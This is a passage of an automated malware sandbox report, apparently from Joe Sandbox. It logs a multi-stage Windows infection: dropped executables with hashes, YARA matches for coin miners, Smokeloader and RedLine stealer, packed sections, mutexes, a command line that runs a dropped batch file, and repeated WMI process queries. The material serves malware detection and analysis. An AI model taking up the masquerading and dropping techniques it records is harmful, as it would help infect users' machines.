                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A88600_2_006A8860
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A70490_2_006A7049
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A78BB0_2_006A78BB
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007781010_2_00778101
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A31A80_2_006A31A8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00777B6E0_2_00777B6E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00664B300_2_00664B30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A2D100_2_006A2D10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00664DE00_2_00664DE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697F360_2_00697F36
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A779B0_2_006A779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A078BB2_2_00A078BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A088602_2_00A08860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A070492_2_00A07049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A031A82_2_00A031A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009C4B302_2_009C4B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009C4DE02_2_009C4DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A02D102_2_00A02D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00A0779B2_2_00A0779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009F7F362_2_009F7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A078BB3_2_00A078BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A088603_2_00A08860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A070493_2_00A07049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A031A83_2_00A031A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009C4B303_2_009C4B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009C4DE03_2_009C4DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A02D103_2_00A02D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00A0779B3_2_00A0779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009F7F363_2_009F7F36
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_001C80115_2_001C8011
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F30685_2_000F3068
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000B4AF05_2_000B4AF0
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F2BD05_2_000F2BD0
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000B4CF05_2_000B4CF0
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000E7D835_2_000E7D83
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F765B5_2_000F765B
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F6F095_2_000F6F09
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F87205_2_000F8720
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000F777B5_2_000F777B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_006730686_2_00673068
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00634AF06_2_00634AF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00672BD06_2_00672BD0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00634CF06_2_00634CF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00667D836_2_00667D83
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0067765B6_2_0067765B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0067777B6_2_0067777B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_006787206_2_00678720
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00676F096_2_00676F09
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006730688_2_00673068
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00634AF08_2_00634AF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00672BD08_2_00672BD0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00634CF08_2_00634CF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00667D838_2_00667D83
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0067765B8_2_0067765B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0067777B8_2_0067777B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006787208_2_00678720
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00676F098_2_00676F09
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B7F13E12_2_00B7F13E
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B724C012_2_00B724C0
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B7545812_2_00B75458
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B747AC12_2_00B747AC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9881712_2_00B98817
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B60DCC12_2_00B60DCC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5F1B412_2_00B5F1B4
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5B11412_2_00B5B114
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B6C27812_2_00B6C278
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9352812_2_00B93528
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B8257812_2_00B82578
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B8066E12_2_00B8066E
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B7D66C12_2_00B7D66C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B6D85812_2_00B6D858
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B899B812_2_00B899B8
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B949A512_2_00B949A5
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B879DC12_2_00B879DC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B7694C12_2_00B7694C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9DA3012_2_00B9DA30
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B8FA0C12_2_00B8FA0C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B68CA812_2_00B68CA8
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9DC1112_2_00B9DC11
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B67C6812_2_00B67C68
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9DD0012_2_00B9DD00
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B76E0812_2_00B76E08
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B58F1812_2_00B58F18
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B6AF5812_2_00B6AF58
                        Source: Joe Sandbox ViewDropped File: C:\Program Files\Windows Media Player\graph\graph.exe D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe ED252FE89BA1243BAD21F373C952B16940A0094149B0BE50E5C3DA9C20A23234
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: Security
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 006780C0 appears 130 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 009DDF80 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 009D80C0 appears 260 times
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 0064DEB0 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 00647F30 appears 256 times
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: String function: 000C7F30 appears 128 times
                        Source: 94CwbGg[1].exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg[1].exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg[1].exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg[1].exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg[1].exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: 94CwbGg.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                        Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                        Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                        Source: Bxq1jd2[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Bxq1jd2.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: EkmIhQM[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: EkmIhQM.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983555432561307
                        Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983555432561307
                        Source: random[1].exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: random[1].exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: b1dc05533c.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: b1dc05533c.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: random[1].exe0.4.drStatic PE information: Section: ZLIB complexity 0.9964396713215259
                        Source: 0d47c4c34f.exe.4.drStatic PE information: Section: ZLIB complexity 0.9964396713215259
                        Source: H9TU4oY[1].exe.4.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                        Source: H9TU4oY[1].exe.4.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                        Source: H9TU4oY.exe.4.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                        Source: H9TU4oY.exe.4.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: Section: ZLIB complexity 0.9986866918103449
                        Source: ZiYbk6W[1].exe.4.drStatic PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
                        Source: ZiYbk6W.exe.4.drStatic PE information: Section: ZLIB complexity 0.9986866918103449
                        Source: ZiYbk6W.exe.4.drStatic PE information: Section: frbjvewh ZLIB complexity 0.9948425751879699
                        Source: random[1].exe1.4.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                        Source: random[1].exe1.4.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                        Source: f11f18202b.exe.4.drStatic PE information: Section: ZLIB complexity 1.0001672196061644
                        Source: f11f18202b.exe.4.drStatic PE information: Section: ubvmxkob ZLIB complexity 0.9945724566850659
                        Source: random[2].exe.4.drStatic PE information: Section: ZLIB complexity 1.000187285958904
                        Source: random[2].exe.4.drStatic PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
                        Source: 3a4323f24d.exe.4.drStatic PE information: Section: ZLIB complexity 1.000187285958904
                        Source: 3a4323f24d.exe.4.drStatic PE information: Section: jaliwopm ZLIB complexity 0.9945024016811769
                        Source: a4bd6a9bcb.exe.4.drStatic PE information: Section: asolipax ZLIB complexity 0.9945088370901639
                        Source: 82bc687fc3.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: 82bc687fc3.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                        Source: axplong.exe.5.drStatic PE information: Section: ZLIB complexity 0.9964396713215259
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: wOKhy9f[1].exe.4.dr, cae530d24e7bf71b77f301796d10b0911.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                        Source: wOKhy9f.exe.4.dr, cae530d24e7bf71b77f301796d10b0911.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                        Source: EkmIhQM[1].exe.4.dr, RazorEditorParser.csTask registration methods: 'CreateAndStart'
                        Source: EkmIhQM[1].exe.4.dr, RazorParser.csTask registration methods: 'CreateParseTask'
                        Source: EkmIhQM.exe.4.dr, RazorEditorParser.csTask registration methods: 'CreateAndStart'
                        Source: EkmIhQM.exe.4.dr, RazorParser.csTask registration methods: 'CreateParseTask'
                        Source: classification engineClassification label: mal100.rans.troj.spyw.evad.mine.winEXE@118/196@0/13
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,12_2_00B5AC74
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B61D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,12_2_00B61D04
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,12_2_00B5ABB0
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Google\Chrome\Extensions
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LWJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:304:WilStaging_02
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
